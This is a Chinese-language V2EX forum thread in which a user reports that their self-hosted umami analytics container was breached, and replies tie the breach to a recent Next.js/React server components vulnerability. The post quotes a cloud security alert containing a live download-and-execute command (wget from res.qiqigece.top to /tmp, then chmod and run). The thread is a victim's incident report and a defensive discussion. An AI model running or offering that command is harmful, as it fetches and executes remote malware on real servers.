V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
183shl
V2EX  ›  信息安全

服务器安装的 umami 也被入侵了!

  •  
  •   183shl · 17 小时 34 分钟前 · 1309 次点击

    晚上收到阿里云告警可疑命令执行

    告警原因
    检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
    用户名
    www
    命令行
    /bin/sh -c wget -O /tmp/nginx3 http://res.qiqigece.top/nginx1;chmod 777 /tmp/nginx3;/tmp/nginx3
    进程 ID
    241050
    父进程 ID
    1061286
    进程链
    -[1061043]  /usr/bin/containerd-shim-runc-v2 -namespace moby -id 5ae04de666d9af832833653883924afe2522ae749cf1635f8e16a086779c6dc4 -address /run/containerd/containerd.sock
        -[1061069]  node /usr/local/bin/pnpm start-docker
            -[1061113]  node /app/node_modules/.bin/../.pnpm/[email protected]/node_modules/npm-run-all/bin/npm-run-all/index.js check-db update-tracker set-routes-manifest start-server
                -[1061275]  node /usr/local/lib/node_modules/pnpm/bin/pnpm.cjs run start-server
                    -[1061286]  next-server (v
    

    微步检测:

    https://s.threatbook.com/report/url/19a03bf704e725d1e64a84b8a245a043

    我是在 docker 部署的,只移除 docker 安全吗?

    7 条回复    2025-12-06 11:31:32 +08:00
    ysicing
        1
    ysicing  
       16 小时 19 分钟前
    最近不是说 nextjs 和 react 漏洞问题么。昨天披露的,今天就有好多 poc 了,我们今天就接到好多的入侵挂码的😂
    183shl
        3
    183shl  
    OP
       12 小时 26 分钟前
    @ysicing 没关注到这个信息。平时这个小服务器也根本不看的,还好阿里云给告警了。看了下日志,发现周五凌晨入侵的,晚六点开始的远程下载。
    abear
        4
    abear  
       12 小时 10 分钟前
    这玩意被入侵了,要重装系统吗 ^-^
    ysicing
        5
    ysicing  
       11 小时 53 分钟前
    @abear 容器没特权的或者能提权调用宿主机服务的话,应该是不需要的
    zerolover
        6
    zerolover  
       3 小时 11 分钟前
    umami 挺好用的,目前我们还是用官网的服务,主要是我们网站访问量没有太多。等后面再自己部署
    tabc2tgacd
        7
    tabc2tgacd  
       1 小时 50 分钟前
    react 的服务器组件漏洞
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2588 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 05:22 · PVG 13:22 · LAX 21:22 · JFK 00:22
    ♥ Do have faith in what you're doing.